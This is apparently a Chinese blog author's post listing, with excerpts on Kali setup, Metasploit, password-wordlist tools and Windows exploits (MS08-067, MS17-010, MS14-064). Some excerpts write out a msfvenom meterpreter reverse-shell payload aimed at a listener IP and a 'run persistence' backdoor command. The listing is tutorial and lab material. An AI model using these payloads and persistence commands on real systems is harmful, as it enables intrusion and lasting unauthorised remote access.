
Kali
大方子
这个作者很懒,什么都没留下…
展开
-
Kali源 + 2020Kali没有arpspoof
用2020Kali的时候发现没有ARPspoof然后老是要百度Kali的源,而且网上的也是各种混杂。就顺便2个问题一起记录下。Kali源(官方 + 网易)#kali 官方源deb http://http.kali.org/kali kali-rolling main non-free contribdeb-src http://http.kali.org/kali kali-rolling main non-free contrib# 网易源deb http://mirrors.163.c原创 2021-03-30 22:09:13 · 7007 阅读 · 0 评论 -
linux vim把tab设置为“4个字符宽度“和”4个空格”的方法
我的linux vim默认是8个字符宽度, annoying得很。设置为4个字符宽度的方法: vim ~/.vimrc一下, 然后添加:set ts=4set noexpandtab设置为4个空格的方法: 把上述的noexpandtab改为expandtab亲测有效。原文地址:https://blog.youkuaiyun.com/stpeace/article/details/7...转载 2020-01-15 22:12:37 · 1980 阅读 · 0 评论 -
Vmware15 + 新版Kali 安装的详细过程
在学校跟朋友一起给新生进行CTF教学,朋友写的一篇关于 Vmware15 和 新版Kali 安装的全过程我看写的挺详细的就分享出来,这里我就放上我的有道云笔记链接,大家可以直接在里面看https://note.youdao.com/ynoteshare1/index.html?id=a12d576ac4af24b4a93116dc43b38964&type=note...原创 2019-12-13 22:04:39 · 2295 阅读 · 2 评论 -
Docker版kali内安装metasploit
1.下载原版kali Docker镜像MacPC:~ liuxin$ docker pull kalilinux/kali-linux-docker2.进入docker kali 容器内MacPC:~ liuxin$ docker run -it --name=kali kalilinux/kali-linux-docker3.安装metasploitroo...转载 2019-10-21 19:44:08 · 1295 阅读 · 0 评论 -
MSF之persistence权限维持
首先,我们先生成一个 PAYLOAD : msfpayload(msfvenom) windows/meterpreter/reverse_tcp LHOST=192.168.2.133 LPORT=1218 X >xx.exe接着,我们来配置一个反弹会话的监听处理:use exploit/multi/handlerset payload windows/meterp...转载 2018-10-18 15:27:37 · 2548 阅读 · 0 评论 -
在Metasploit中使用数据库
将Metasploit与数据库建立连接可以加快搜索的速度,缩短响应的时间。如图是没有建立与数据库连接时候的情形 如果需要使用数据库,需要先启动Metasploit的数据库服务root@kali:~# service postgresql startroot@kali:~# msfdb init 然后我们启动msfconsole输入db_status ...原创 2018-10-15 13:55:04 · 1734 阅读 · 0 评论 -
linux下字典生成工具-crunch与rtgen
所谓的密码字典主要是配合密码破解软件所使用,密码字典里包括许多人们习惯性设置的密码。这样可以提高密码破解软件的密码破解成功率和命中率,缩短密码破解的时间。当然,如果一个人密码设置没有规律或很复杂,未包含在密码字典里,这个字典就没有用了,甚至会延长密码破解所需要的时间。在Linux中有Crunch和rtgen两个工具,可以来创建密码字典。为方便用户的使用,本节将介绍这两个工具的使用方法。1 .C...转载 2018-10-13 22:04:14 · 2038 阅读 · 0 评论 -
Kali渗透测试——netdiscover
基于ARP的网络扫描工具netdiscoverARP是将IP地址转化物理地址的网络协议。通过该协议,可以判断某个IP地址是否被使用,从而发现网络中存活的主机。Kali Linux提供的netdiscover工具,就是借助该协议实施主机发现。它既可以以被动模式嗅探存活的主机,也可以以主动模式扫描主机。用户还可以根据网络稳定性,调整发包速度和数量。查看网络信息 扫描本地网络主...转载 2018-09-19 21:20:04 · 3625 阅读 · 0 评论 -
Kali 中 Persistence后门的使用
这里我就用最经典的漏洞ms08_067进行演示 靶机:192.168.193.128攻击机:192.168.193.135 这里我就省去ms08_067漏洞的使用过程,直接讲当ms08_067拿到shell之后的操作 这里我们已经拿到权限了 然后执行 run persistence -S -U -X -i 5 -p 446 -r 192.168.193.13...原创 2018-09-02 11:03:49 · 3620 阅读 · 3 评论 -
smb(ms17-010)远程命令执行之msf
本次用到的环境:kali(2016.2)32位系统.ip地址:192.168.1.104目标靶机为:win7sp1x64系统(关闭防火墙),ip地址:192.168.1.105具体的步骤如下:kali系统下安装wine32:apt-get install wine32 =================================若kali为64位...转载 2018-08-21 21:28:22 · 2541 阅读 · 0 评论 -
2018-8-31安装新版Kali遇到的SSH问题【ssh配置文件没有PermitRootLogin选项】
前几天电脑加了内存,之前配的kali也不是很好打算重新装。下了最新的KALI,但是在ssh问题上遇到麻烦 在/etc/ssh/ssh_config中没有PermitRootLogin yes选项 网上的文章千篇一律都是一样的都没有,后来找到了 需要编辑的是/etc/ssh/sshd_config文件然后把对用选项启动即可和 然后重启下service ssh ...原创 2018-08-31 21:29:47 · 8449 阅读 · 2 评论 -
MS14-064 漏洞测试入侵win7
Microsoft Windows OLE远程代码执行漏洞,OLE(对象链接与嵌入)是一种允许应用程序共享数据和功能的技术,远程攻击者利用此漏洞通过构造的网站执行任意代码,影响Win95+IE3 – Win10+IE11全版本...metasploit里已经加入了此漏洞的利用模块 :exploit/windows/browser/ms14_064_ole_code_execution执...转载 2018-08-21 18:17:15 · 13562 阅读 · 13 评论 -
Meatsploit Framework msfvenom使用简介
2015年6月8日,Wei Chen在rapid7官方博客上发文,将于近期移除metasploit-framework版本中的msfencoder和msfpayload,并使用msfvenom取代。官方的msfvenom使用说明戳这里,下面给出翻译的使用说明。最近一次更新的msf中已经去掉了这两个工具,同时,msfcli也即将被移除。 kali和BT目前使用的MSF依然是旧版,...转载 2018-08-24 14:55:04 · 871 阅读 · 0 评论 -
利用公网Msf+MS17010跨网段攻击内网(不详细立马关站)
前言其实很多小白在对利用msf进行ms17010攻击的时候总是不成功,其实这都是因为网上大部分的文章都是写的内网对内网(192.168.1.2-->192.168.1.3)这样的案例,今天写了一下利用公网的MSF直接攻击其他服务器内网的案例。准备工作1.安装了Msf的公网主机+Ubuntu系统2.一台其他服务器内网存在445漏洞3.细心,细心,细心,钻研,钻研!!!...转载 2018-08-24 14:29:32 · 17019 阅读 · 7 评论